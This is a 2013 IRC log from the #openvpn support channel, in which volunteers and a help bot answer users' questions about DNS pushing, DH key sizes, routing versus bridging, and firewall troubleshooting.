joined #openvpn 23:38 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 245 seconds] --- Day changed Fri Feb 15 2013 00:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.1.72] has quit [Ping timeout: 256 seconds] 01:20 -!- b1rkh0ff [~b1rkh0ff@178.77.18.35] has joined #openvpn 01:49 < daemoen> hey guys, anyone happen to know if mountain lion is busted again as far as dhcp dns and openvpn is concerned... it was at one point working, but doesnt seem to be now 01:50 < daemoen> figured someone might know =) 01:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 02:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds] 02:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:54 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 03:10 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:12 -!- zz_AsadH is now known as AsadH 03:16 -!- scoates [~sean@iconoclast.caedmon.net] has quit [Ping timeout: 255 seconds] 03:30 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:35 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 260 seconds] 03:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:03 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 04:03 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 264 seconds] 04:05 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds] 04:07 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds] 04:07 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 04:08 -!- ade_b [~Ade@195.198.34.212] has joined #openvpn 04:08 -!- ade_b [~Ade@195.198.34.212] has quit [Changing host] 04:08 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:12 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 04:12 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 240 seconds] 04:14 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 04:16 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 255 seconds] 04:26 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 04:30 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 252 seconds] 04:37 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 04:38 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 04:45 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 04:50 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 05:09 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 256 seconds] 05:10 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 05:11 -!- MariusIT2 [~userit@86.120.191.55] has joined #openvpn 05:12 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 05:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:25 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Quit: http://quassel-irc.org - Chat comfortably. Anywhere.] 05:35 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 05:48 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 05:50 -!- knobo [~bohmer@81.175.44.217] has quit [Remote host closed the connection] 06:41 -!- p3rror [~mezgani@2001:0:53aa:64c:1081:387a:d607:9373] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:01 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 07:01 -!- master_of_master [~master_of@p57B52CEE.dip.t-dialin.net] has quit [Read error: Operation timed out] 07:05 -!- master_of_master [~master_of@p57B54A92.dip.t-dialin.net] has joined #openvpn 07:05 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 07:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 07:21 -!- p3rror [~mezgani@2001:0:53aa:64c:1081:387a:d607:9373] has quit [Ping timeout: 245 seconds] 07:34 -!- p3rror [~mezgani@2001:0:53aa:64c:38c3:387a:d606:6e84] has joined #openvpn 07:39 -!- xbanux [~xbanux@115.254.75.113] has quit [Ping timeout: 276 seconds] 07:43 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:46 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:51 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 07:52 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 07:52 -!- p3rror [~mezgani@2001:0:53aa:64c:38c3:387a:d606:6e84] has quit [Ping timeout: 245 seconds] 07:55 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:59 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn [] 08:00 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:01 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 08:02 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:05 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn [] 08:06 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:09 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 08:09 -!- p3rror [~mezgani@2001:0:53aa:64c:6a:387a:d607:2e76] has joined #openvpn 08:20 -!- MeanderingCode_ [~Meanderin@71-213-175-106.albq.qwest.net] has quit [Remote host closed the connection] 08:21 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:23 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 08:24 -!- p3rror [~mezgani@2001:0:53aa:64c:6a:387a:d607:2e76] has quit [Ping timeout: 245 seconds] 08:33 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 08:39 -!- p3rror [~mezgani@2001:0:53aa:64c:3070:387a:d606:6f0a] has joined #openvpn 08:40 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:44 -!- MariusIT2 is now known as MariusIT 08:56 -!- p3rror [~mezgani@2001:0:53aa:64c:3070:387a:d606:6f0a] has quit [Ping timeout: 245 seconds] 09:00 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 248 seconds] 09:00 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has joined #openvpn 09:10 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has joined #openvpn 09:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:14 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has quit [Max SendQ exceeded] 09:14 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has joined #openvpn 09:16 -!- MariusIT2 [~userit@86.120.191.55] has joined #openvpn 09:20 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 09:20 -!- AsadH is now known as zz_AsadH 09:26 -!- p3rror [~mezgani@2001:0:53aa:64c:1059:387a:d673:dbaf] has quit [Ping timeout: 245 seconds] 09:36 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 240 seconds] 09:38 -!- nullsign [~nullsign@daedalus.genom.com] has left #openvpn [] 09:38 -!- p3rror [~mezgani@2001:0:53aa:64c:4e6:387a:d607:3a4e] has joined #openvpn 09:44 -!- p3rror [~mezgani@2001:0:53aa:64c:4e6:387a:d607:3a4e] has quit [Ping timeout: 245 seconds] 09:51 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 09:58 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 10:02 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has joined #openvpn 10:05 < btjanes> hi, so is there a trick in getting Mountain Lion to honor the DNS settings that are pushed from the server? the resolv.conf has the settings but from what i've read, ML doesn't honor that file 10:06 < btjanes> for now, i'm just adding our lan hosts into my /etc/hosts file 10:06 < btjanes> which is obviously annoying 10:16 -!- ASUchander [~asuchande@cpe-071-070-224-227.nc.res.rr.com] has joined #openvpn 10:17 < ASUchander> Hello if I have a CA with a keylength of 4096, am I required to make my dh parameters 4096 as well? 10:18 < ASUchander> I'm assuming a larger key length will slow down the initial connection and key negotiation, but then everything else will be relatively the same speed as with a smaller keylength, since it switches to a shared-secret encryption method, right? 10:19 -!- zz_AsadH is now known as AsadH 10:20 < EugeneKay> No, DH doesn't have to match key size 10:20 < EugeneKay> And correct. 10:21 < ASUchander> thanks EugeneKay :-) 10:25 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:31 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has quit [Ping timeout: 244 seconds] 10:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has joined #openvpn 10:43 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:47 -!- AsadH is now known as zz_AsadH 10:51 -!- raidz_away is now known as raidz 11:05 -!- p3rror [~mezgani@2001:0:53aa:64c:2c17:6329:d606:8bc8] has joined #openvpn 11:15 -!- ngharo [~ngharo@shepard.sypherz.com] has quit [Quit: Reconnecting] 11:15 -!- ngharo [~ngharo@hacked.thegov.us] has joined #openvpn 11:17 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 11:17 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 11:17 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 11:18 -!- p3rror [~mezgani@2001:0:53aa:64c:2c17:6329:d606:8bc8] has quit [Ping timeout: 245 seconds] 11:25 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Quit: Reconnecting] 11:25 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 11:34 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:53 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 276 seconds] 11:55 -!- zz_AsadH is now known as AsadH 12:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:11 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:11 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:11 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:11 -!- mode/#openvpn [+o krzee] by ChanServ 12:11 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/ <-- my first interview :D 12:11 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com) 12:13 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:16 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 12:17 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:20 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn 12:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 12:31 -!- jdcaddie [~jdcaddie@unaffiliated/jdcaddie] has joined #openvpn 12:33 < jdcaddie> Does anyone have a moment to answer a couple questions 12:33 <@krzee> !ask 12:33 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 12:33 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 12:33 <@krzee> (yep, vpnHelper knows all) 12:34 < jdcaddie> Is there a way to do a mass import of users from LDAP using OpenVPN Access Server? 12:35 <@krzee> !as 12:35 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 12:36 <@krzee> community channel supports community version, AS channel supports AS version 12:36 -!- jdcaddie [~jdcaddie@unaffiliated/jdcaddie] has left #openvpn ["Leaving"] 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has left #openvpn [] 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has joined #openvpn 12:37 -!- btjanes [~btjanes@99-169-248-155.lightspeed.iplsin.sbcglobal.net] has left #openvpn [] 12:39 < daemoen> hey guys, what is the *proper* way of adding multiple search paths via push dhcp-option DOMAIN... is it semi colon, new entry for each, space dileneated? 12:39 <@plaisthos> not supported 12:39 <@plaisthos> dhcp itself does not support that 12:39 < daemoen> what about option 119 ? 12:40 <@plaisthos> well that might work but iirc not all client support it and I think there is no openvpn dhcp option for that 12:41 < daemoen> right, ms has a hard time working with dhcp options in general, unless youre binding to AD 12:42 < daemoen> most other oses (linux, bsd, osx) can all support 119, so was curious :) 12:42 <@krzee> http://tools.ietf.org/html/rfc3397#page-2 12:42 <@vpnHelper> Title: RFC 3397 - I-D Tag: (at tools.ietf.org) 12:42 <@plaisthos> feel free to submit patches :) 12:43 <@krzee> =] 12:46 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Read error: Connection reset by peer] 12:47 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has joined #openvpn 13:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 13:16 -!- matsh [divine@nanogene.org] has joined #openvpn 13:22 -!- dazo is now known as dazo_afk 13:29 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has quit [Changing host] 13:29 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has joined #openvpn 13:40 -!- xbanux [~xbanux@triband-mum-59.182.176.161.mtnl.net.in] has quit [Ping timeout: 252 seconds] 13:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 13:50 -!- tyteen4a03 [T4@n218250226180.netvigator.com] has quit [Quit: Leaving] 13:51 -!- tyteen4a- [tyteen4a03@69.50.229.69] has joined #openvpn 13:52 -!- tyteen4a- is now known as tyteen4a03 14:17 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has joined #openvpn 14:18 < kbarry> I got my openvpn connections working several months ago. They are not working now. I am onsite with my vpn server (on a buffalo router). How might i go about testing the vpn connection without having to go to an alternate location first? 14:19 <@krzee> by looking at the logs 14:19 < kbarry> Anyone here? 14:19 < kbarry> krzee you mind helping me understand my logs? 14:19 <@krzee> !logs 14:19 < kbarry> pastebin? 14:19 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 14:20 < kbarry> !logs 14:20 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 14:21 < kbarry> gotta figure out how to make verb set to 5 :) 14:22 <@krzee> you can post what you have for now 14:22 <@krzee> if i need 5 ill tell ya 14:22 <@krzee> but you would do so by putting "verb 5" in your configs 14:23 < kbarry> http://pastebin.com/HZckRdeW 14:23 < kbarry> Thanks for responding. 14:24 < kbarry> vpn/openvpn is a bit mysterious to me. 14:24 <@krzee> are you using the same subnet for --server as the lan you are on? 14:24 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:24 < kbarry> I don't know how to answer that. The router thats acting as the server for the openvpn is also acting as the wireless accesspoint. 14:25 <@krzee> actually i dont know why im asking, i see that you are 14:25 < kbarry> i'm not a network expert by an stretch f the imagination. 14:25 <@krzee> !goal 14:25 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 14:27 < kbarry> I want to do 2 things. #1: Allow remote users (like on a laptop) to access a certain file on our server here at our store. (accounting file), and 2, if possible, create a persistant connection between our store and out workshop (20 miles apart). 14:27 <@krzee> between the 2 lans? 14:27 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:27 <@krzee> those are both very doable 14:27 <@krzee> do you have local access to the server right now? 14:27 < kbarry> in goal 2, To simplify it, if someone get "connected" to the wireless in city A, i want them to also hae access to the file server at location B 14:28 < kbarry> to be clear, there are 2 server, one i will callt he fileserver (With the file i wanna share), 14:28 <@krzee> what devices will openvpn be running on on each side? 14:28 <@krzee> on a server? on routers? 14:28 < kbarry> the other being the openvpn server, and i will call it the "server" 14:29 < kbarry> Goal 1 is more pressing. 14:29 < kbarry> server vpnserver is a router. 14:29 < kbarry> DD-WRT Buffalo WHR-G54S 14:30 < kbarry> its also the accesspoint for this location. 14:30 <@krzee> nice 14:30 <@krzee> that cuts out a step 14:30 <@krzee> how about the client at the other office? 14:30 < kbarry> I used to have the computer i am on connecting from home. 14:30 <@krzee> another vpn router? 14:31 < kbarry> for now, it may be simplier (i dont have another buffalo router) to set the desktops to connect as a service at startup. 14:31 < kbarry> for whatever reason it seemed to stop working, 14:31 < kbarry> never did figure out what was going on, and as i didn't have a great need, i just let it alone till recently. 14:33 < pekster> At the very least "All TAP-Win32 adapters on this system are currently in use." is a problem 14:33 < EugeneKay> There's a shortcut in the start menu to add a second adapter 14:33 < kbarry> hmm, i just noticed one of my "netwokr cars" was diabled. 14:34 < pekster> EugeneKay, FYI there's a bug in 2.3.0 and it's not in the start menu on Windows unless the user manually extracts tap-windows.exe from the install archive (eg: 7-zip) and re-installs it with the utilities 14:34 < pekster> I sent a report to the mailing list, so hopefully that'll get fixed in the next release 14:34 < EugeneKay> Wow, that sucks. 14:34 < pekster> Indeed 14:34 <@krzee> kbarry, you only need 1 machine on the office lan 14:35 <@krzee> you can route lans over a single vpn connection 14:35 <@krzee> !serverlan 14:35 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 14:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 14:36 < kbarry> :) Thanks, it seems stupid now, but i think that ight have been the problem on this computer (the disabled nic) 14:37 <@krzee> looks like bigger problems too tho 14:37 <@krzee> pastebin your server config 14:37 < kbarry> hmm, lemme see if i know how to get that. 14:38 < pekster> EugeneKay: Ah, as of 10h ago a new 2.3.0 (build I004) fixes this 14:39 < kbarry> http://pastebin.com/WKkfqDeV 14:39 < kbarry> my laptop is "connected" now, even while on location. 14:40 <@krzee> oh i see you're on location 14:40 < kbarry> i am now, 14:40 < kbarry> it might not work when offsite. 14:49 < kbarry> krzee what seems to be wrong with out server? You mentioned there might be a bigger problem. 14:49 <@krzee> oh i see 14:49 <@krzee> you're bridging 14:49 <@krzee> may i ask why? 14:49 < kbarry> i was blindly following a tutorial. 14:49 < kbarry> :) 14:49 <@krzee> ahh 14:49 <@krzee> wanna do it the right way? 14:50 < kbarry> Do i EVER! 14:50 <@krzee> you use linux? 14:50 < kbarry> no. It has cooties. 14:51 < kbarry> actually, i respect that its more that i can hndle for my needs :) 14:51 < kbarry> i do have it in one of y environments but have someone else who actually knows linux administer it. 14:53 < kbarry> vpn was working on a stationary computer at our other location (its both a home and business lan, and a anti-porn device was installed on the network, and the vpn stopped working from that location. 14:53 < kbarry> its a separate problem all together, 14:53 < kbarry> if there is a "the right way to do it" tutorial, i can probable try it on my own, and get back with ya'll here if i run into trouble. 14:54 <@krzee> ok 14:54 < kbarry> btw, what does "bridging" mean? 14:54 <@krzee> !sample 14:54 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 14:54 <@krzee> !tunortap 14:54 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 14:54 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 14:55 <@krzee> !route 14:55 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 14:55 <@krzee> but if you had access to linux, this would be easy: 14:55 <@krzee> !confgen 14:55 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 14:55 <@krzee> i made a configuration file generator =] 14:55 < kbarry> hmmmmmmmmmm. 14:55 < kbarry> is it a oen time use kinda thing 14:56 <@krzee> yep, just makes config files 14:56 < kbarry> meaning, could i use a linux environment for setup, but nt need linux after that? 14:56 < kbarry> the linux machine wouldnt be acting as a server or anything? 14:56 <@krzee> it just helps you make your configs 14:56 < kbarry> just setup.? 14:57 < kbarry> alright. 14:57 < kbarry> I'm gonna see if i can get a linux environment avaliable. 15:01 < kbarry> crap, 15:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:01 < kbarry> the config template you sent me, 15:01 < kbarry> i don't know what the parameters mean, and at the same time, i cant call the man for them. 15:02 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has joined #openvpn 15:02 < zhvtar> Hello All 15:02 < rob0> why not? 15:02 < rob0> !man 15:02 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 15:03 < kbarry> Awesom. Thanks. 15:03 < zhvtar> I am looking to set up two separate vpns; can this be done with a single server? 15:03 < kbarry> krzee do you recomment the linked tempalted but with my settings. 15:04 < rob0> zhvtar, you can run as many instances of openvpn as your system can handle (or as many as its administrator can juggle.) 15:04 <@krzee> zhvtar, you can run as many as you want, but each must use its own ip:port:proto 15:04 <@krzee> each with its own config 15:04 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 15:05 <@krzee> kbarry, ignore the sample if using the confgen 15:06 < kbarry> well, as i think on it, getting the confgen working may be a more difficult route. 15:06 <@krzee> ok 15:06 < kbarry> no pun intended. 15:06 < zhvtar> krzee: ip means the private range, not the external isp ip right? 15:07 <@krzee> then start with the sample configs, change the filenames to match yours, then we'll work on the routing 15:07 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 252 seconds] 15:07 <@krzee> both really, but i meant all 3 together, ip:port:protocol 15:08 < kbarry> ok, i'll have to do that later, i'll jump back on later and were pick it up from there if your around. Thanks for the help. 15:08 <@krzee> you can run 1 on udp and 1 on tcp on the same ip:port 15:08 <@krzee> i wont be around 15:08 <@krzee> but cool 15:08 < kbarry> not later today 15:08 < kbarry> late like next week, 15:08 <@krzee> basically what you wanna do is get a routed tun vpn up with routing to the lans 15:08 <@krzee> !route 15:08 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 15:08 <@krzee> is the main stuff you'll want to understand ^ 15:08 < kbarry> ok 15:10 -!- kbarry [~chatzilla@rrcs-24-153-167-50.sw.biz.rr.com] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 15:10 < zhvtar> currently have them running on two diff machines, using diff ports. 15:13 -!- p3rror [~mezgani@2001:0:53aa:64c:1823:5b24:d606:8bc8] has joined #openvpn 15:13 -!- Ahti333 [~Ahti333@cronosx.de] has left #openvpn ["Textual IRC Client: www.textualapp.com"] 15:15 < zhvtar> !tcpip 15:15 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 15:19 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 15:19 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 15:19 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 15:30 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 15:50 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 15:54 -!- Holiday [~rjr162@128.118.15.39] has quit [Remote host closed the connection] 16:19 -!- Shway [~Shway@216.208.252.66] has quit [Quit: Want to be different? Try HydraIRC -> http://www.hydrairc.com <-] 16:30 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:31 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has joined #openvpn 16:31 < TechSmurf> Are there any common reasons that OpenVPN will connect successfully but not pass packets? 16:32 < pekster> Firewall, or IP routing in the case of forwarded traffic 16:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 16:43 < TechSmurf> guess I couldn't avoid installing wireshark on this laptop forever... 16:45 < TechSmurf> huh 16:45 < TechSmurf> nvm. 16:50 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:50 < TechSmurf> wireshark showed me the obvious... while my pings weren't returning, some random background system dns queries were... firewall it is. 16:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 16:53 < TechSmurf> I think tap was breaking it too 16:54 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 16:55 < TechSmurf> yeah, it broke under tap entirely 16:56 < TechSmurf> I had done stuff that would have gotten through the firewall before if tap had connected right... just verified it too. Thanks anyway :) 16:56 -!- TechSmurf [~jdaniel@unaffiliated/techsmurf] has left #openvpn [] 16:59 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 17:00 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 17:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 17:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 17:04 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 17:14 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 17:33 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:37 < Kireji> !redirect 17:37 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 17:37 <@vpnHelper> http://ircpimps.org/redirect.png 17:38 < Kireji> !ipforward 17:38 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 17:38 < Kireji> !linipforward 17:38 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must 